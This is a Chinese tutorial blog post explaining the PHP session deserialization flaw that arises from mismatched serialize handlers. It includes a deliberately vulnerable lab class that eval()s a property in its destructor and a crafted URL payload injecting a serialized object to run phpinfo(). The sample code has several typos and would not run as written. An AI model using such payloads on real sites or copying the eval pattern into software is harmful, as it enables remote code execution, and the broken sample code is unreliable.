php session反序列化漏洞详解

已于 2022-10-25 22:23:40 修改
阅读量849 收藏
点赞数
分类专栏: web 文章标签: php 安全 web安全
于 2022-10-25 22:11:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39511050/article/details/127521126
版权

session的反序列化漏洞,就是利用php处理器和php_serialize处理器的存储格式差异而产生

漏洞大概流程和思路

a.php(用php_serialize处理器)执行后会将内容用php_serialize处理器序列化然后在浏览器上存储一个文件,名字为:sess_sessionid
b.php(用php处理器)执行会从请求头的cookie中带来sessionid,由于浏览器上存在sess_sessionid文件,所以直接去找该文件用php处理器反序列其内容(处理器不同反序列化的内容必然不会跟序列化的内容一直),就触发了_weakup()最后执行_destruct()方法

例题:
a.php

<?phpini_set('session.serialize_handler', 'php_serialize');
	session_start();
	$_SESSION['session']=$GET['session'];
	echo $_SESSION['session';]
?>

b.php

<?phpsession_start();
class B{    
public $name;
function _wakeup(){
	echo "who are you"
	} 
funtcion  _destruct(){
	eval($this->name)
}$str=new B();?>

构建URL进行访问:

http://www.session-serialize.com/a.php?session=|O:1:"B":1:{s:4:"name";s:10:"phpinfo();";}

打开PHPSESSID文件可看到序列化存储的内容

a:1:{s:7:"session";s:45:"|O:1:"B":1:{s:4:"name";s:10:"phpinfo();";}

访问b.php 由于sessionid文件名不变,找到文件后用php处理器反序列化文件内容,又
因为php用|作为分隔符,所以竖线后O:1:“B”:1:{s:4:“name”;s:10:"phpinfo();的内容将会被反序列化即执行phpinfo(),所以访问b.php 的内容如下
在这里插入图片描述

备注:

PHP session工作流程

以PHP为例,理解session的原理

PHP脚本使用 session_start()时开启session会话,会自动检测PHPSESSID
如果Cookie中存在,获取PHPSESSID
如果Cookie中不存在,创建一个PHPSESSID,并通过响应头以Cookie形式保存到浏览器
初始化超全局变量$_SESSION为一个空数组
PHP通过PHPSESSID去指定位置(PHPSESSID文件存储位置)匹配对应的文件
存在该文件:读取文件内容(通过反序列化方式),将数据存储到$_SESSION中
不存在该文件: session_start()创建一个PHPSESSID命名文件
程序执行结束,将$_SESSION中保存的所有数据序列化存储到PHPSESSID对应的文件中

PHP session序列化机制

根据php.ini中的配置项,我们研究将$_SESSION中保存的所有数据序列化存储到PHPSESSID对应的文件中,使用的三种不同的处理格式,即session.serialize_handler定义的三种引擎:

php	键名 + 竖线 + 经过 serialize() 函数反序列处理的值
php_binary	键名的长度对应的 ASCII 字符 + 键名 + 经过 serialize() 函数反序列处理的值
php_serialize (php>=5.5.4)	经过 serialize() 函数反序列处理的数组

php 处理器存储格式

键名竖线serialize() 函数反序列处理的值
$_SESSION[‘name’]的键名:name|s:10:“phpinfo();”

php_binary处理器序列化的结果

键名竖线serialize() 函数反序列处理的值
$namenamenamenamenamenamenamenamenames:10:“phpinfo();”

php_serialize处理器序列化的结果

a:1:{s:4:"name";s:10:"phpinfo()";}

在php.ini中存在三项配置项:

session.save_path=""   --设置session的存储路径

session.save_handler="" --设定用户自定义存储函数,如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式)

session.auto_start   boolen --指定会话模块是否在请求开始时启动一个会话,默认为0不启动

session.serialize_handler   string --定义用来序列化/反序列化的处理器名字。默认使用php

以上的选项就是与PHP中的Session存储和序列话存储有关的选项。

存储机制

php中的session中的内容并不是放在内存中的,而是以文件的方式来存储的,存储方式就是由配置项session.save_handler来进行确定的,默认是以文件的方式存储。

存储的文件是以sess_sessionid来进行命名的,文件的内容就是session值的序列话之后的内容。

PHP Session中的序列化危害

PHP中的Session的实现是没有的问题,危害主要是由于程序员的Session使用不当而引起的。

如果在PHP在反序列化存储的$_SESSION数据时使用的引擎和序列化使用的引擎不一样,会导致数据无法正确第反序列化。通过精心构造的数据包,就可以绕过程序的验证或者是执行一些系统的方法。

火腿肠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP常见漏洞的防范措施
大鹏
12-18 1993
一、常见PHP网站安全漏洞 对于PHP漏洞,目前常见的漏洞有五种。分别是Session文件漏洞、SQL注入漏洞、脚本命令执行漏洞、全局变量漏洞和文件漏洞。这里分别对这些漏洞进行简要的介绍。 1、session文件漏洞 Session攻击是黑客最常用到的攻击手段之一。当一个用户访问某一个网站时,为了免客户每进人一个页面都要输人账号和密码,PHP设置了Session和Cookie用
Session 反序列化漏洞
Welcome To Myon'Blog !
07-03 483
Session 反序列化 当序列化存储Session数据与反序列化读取Session数据的方式不同时,就可以利用引擎之间的差异产生序列化注入漏洞session反序列化漏洞就是利用php处理器和php_serialize处理器的存储格式差异。 总的来说就是,我们先判断它是否存在这样一个漏洞,一般看到有这些比较具有特征性PHP代码我们就该想到这个方向,存在session反序列化漏洞的话,我们先进行序列化,然后在结果前添加 | (管道符),在传参页面进行上传,再去刷新读取页面即可。
php-session反序列化
weixin_63231007的博客
12-30 895
一篇对session反序列化原理的探索
PHP session反序列化漏洞
weixin_60719780的博客
02-12 569
PHPsession存储和读取时,都会有一个序列化和反序列化的过程,PHP内置了多种处理器用于存取 $_SESSION 数据,都会对数据进行序列化和反序列化PHP中的Session的实现是没有的问题的,漏洞主要是由于使用不同的引擎来处理session文件造成的。在session.php中存储,这里要注意,因为session.php存储器使用了php.serialize,而session.php使用的是php,因此漏洞的主要原因在于不同的引擎对于竖杠' | '的解析产生歧义。session反序列化漏洞
php session 会话固定漏洞
02-27
本书详细阐述了php中的session会话固定漏洞可能引发的安全问题,叙述了php代码审计的一些tips。
深入浅析PHPsession反序列化漏洞问题
10-19
主要介绍了PHPsession反序列化漏洞问题,需要的朋友可以参考下
PHP反序列化漏洞详解.rar
02-07
在IT安全领域,PHP反序列化漏洞是一种常见的安全隐患,尤其在Web应用开发中。这个话题在CTF(Capture The Flag)网络安全竞赛中也常被用作挑战,因为理解和利用这种漏洞需要深入理解PHP语言和其内部工作原理。下面将...
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化和反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
绕过前端加密进行爆破
weixin_34101229的博客
07-14 517
1.概述 现在很多web 在登陆的过程中会用 js 对账号密码进行加密之后再进行传输,我们利用代理工具抓到的包看到账号密码是密文而非明文,这样对批量爆破或者撞库进行传参就会产生障碍,所以这片文章对遇到这类问题如何解决思路的一个分析。 2.思路 一般有两种思路,其一对 js 进行分析,拆解js 的加密算法,利用自己熟悉的语言进行重写,这里...
CTF web题总结--爆破用户名密码
bob的博客
08-31 1万+
1、burp爆破用户名密码 2、id,userid,useId多试几次 3、爆破后台目录,index.php,users.php,login.php,flag.php 4、脚本:# -*- coding:utf-8 -*- import httplib import re import urllibclass Attacker: def __init__(self, mode, url)
PHP session反序列化漏洞原理解析
Askshhbs的博客
04-25 411
网络安全web,Kali,渗透测试相关课件,工具,资料 可以关注公众号:“掌控安全课堂” 回复:“我想学黑客”即可免费获得 PHPsession反序列化漏洞,是当序列化存储Session数据与反序列化读取Session数据的方式不同时产生的。 总结学习,能力有限,如有错误请大佬指出。 什么是session 官方Session定义:在计算机中,尤其是在网络应用中,称为“会话控制”。Session对象存储特定用户会话所需的属性及配置信息。主要有以下特点: session保存的位置是在服务器
phpsession反序列化
qq_63928796的博客
11-28 369
把修改的后的payload放入sessionphp储存session的方式来反序列化脚本,执行eval。中的值生成一个新的session然后改成第一种的格式,传入题目就可以执行eval函数了。,所以我们要进行反序列化,但没有serialize函数,只有。是上面提到的第二种,但题目是第一种,我们只需要改稍微改一下。就是我们上面说的php储存session的第一种。刷新之后就可以从题目中看到执行ls了。所以我们可以通过修改。有一个类,我们最终要利用。看一下session
四个实例递进php反序列化漏洞理解
大方子
09-14 8028
索引 最近在总结php序列化相关的知识,看了好多前辈师傅的文章,决定对四个理解难度递进的序列化思路进行一个复现剖析。包括最近Blackhat议题披露的phar拓展php反序列化漏洞攻击面。前人栽树,后人乘凉,担着前辈师傅们的辅拓前行! D0g3 为了让大家进入状态,来一道简单的反序列化小题,新来的表哥们可以先学习一下php序列化和反序列化。顺便安利一下D0g3小组的平台...
PHP反序列化入门之session反序列化
weixin_44304686的博客
06-12 1091
原文链接:https://mochazz.github.io/2019/01/29/PHP反序列化入门之session反序列化/ PHPsession机制 在学习 session 反序列化之前,我们需要了解这几个参数的含义。 Directive 含义 session.save_handler session保存形式。默认为files session.save_path ses...
php漏洞
12-12 601
从现在的网络安全来看,大家最关注和接触最多的WEB页面漏洞应该是ASP了,在这方面,小竹是专家,我没发言权.然而在PHP方面来看,也同样存在 很严重的安全问题,但是这方面的文章却不多.在这里,就跟大家来稍微的讨论一下PHP页面的相关漏洞吧.     我对目前常见的PHP漏洞做了一下总结,大致分为以下几种包含文件漏洞,脚本命令执行漏洞,文件泄露漏洞,SQL注入漏洞等几种.当然,至于 COOKI
反序列化漏洞汇总
热门推荐
weixin_29324013的博客
07-03 4万+
反序列化漏洞汇总1、概述序列化是让Java对象脱离Java运行环境的一种手段,可以有效的实现多平台之间的通信、对象持久化存储。 Java 序列化是指把 Java 对象转换为字节序列的过程,便于保存在内存、文件、数据库中,ObjectOutputStream类的 writeObject() 方法可以实现序列化。反序列化是指把字节序列恢复为 Java 对象的过程,ObjectInputStream 类...
关于反序列化漏洞的一些理解
才不是小弱鸡的博客
09-16 9479
  php类可能会包含一些特殊的函数叫magic函数,magic函数命名是以符号__开头的,比如 __construct, __destruct, __toString, __sleep, __wakeup等等。这些函数在某些情况下会自动调用,比如__construct当一个对象创建时被调用,__destruct当一个对象销毁时被调用,__toString当一个对象被当作一个字符串使用。为了更好的...
记录一次php.ini中session.save_path的坑
生活不止眼前的苟且
10-24 7832
今天下午公司测试环境的项目(thinkphp3.2)突然报错,报错内容如下: 一脸懵逼哦,明明昨天还能访问~~ 好吧,问题还是要解决,看报错内容大概就是memcache存不了session,然后有遇到坑,明明测试环境的memcache没问题,不对,这个10.24.181.176是哪来的,发现并不是测试环境的ip,telnet这个ip的11211端口也是连不上的,问题基本定位了,现在的解决方案就是找...
session反序列化漏洞
最新发布
07-28
回答: Session反序列化漏洞是一种利用PHP处理器和PHP序列化处理器之间的差异来注入恶意代码的漏洞。当序列化存储Session数据与反序列化读取Session数据的方式不同时,就可以利用这种差异来进行攻击。具体来说,通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值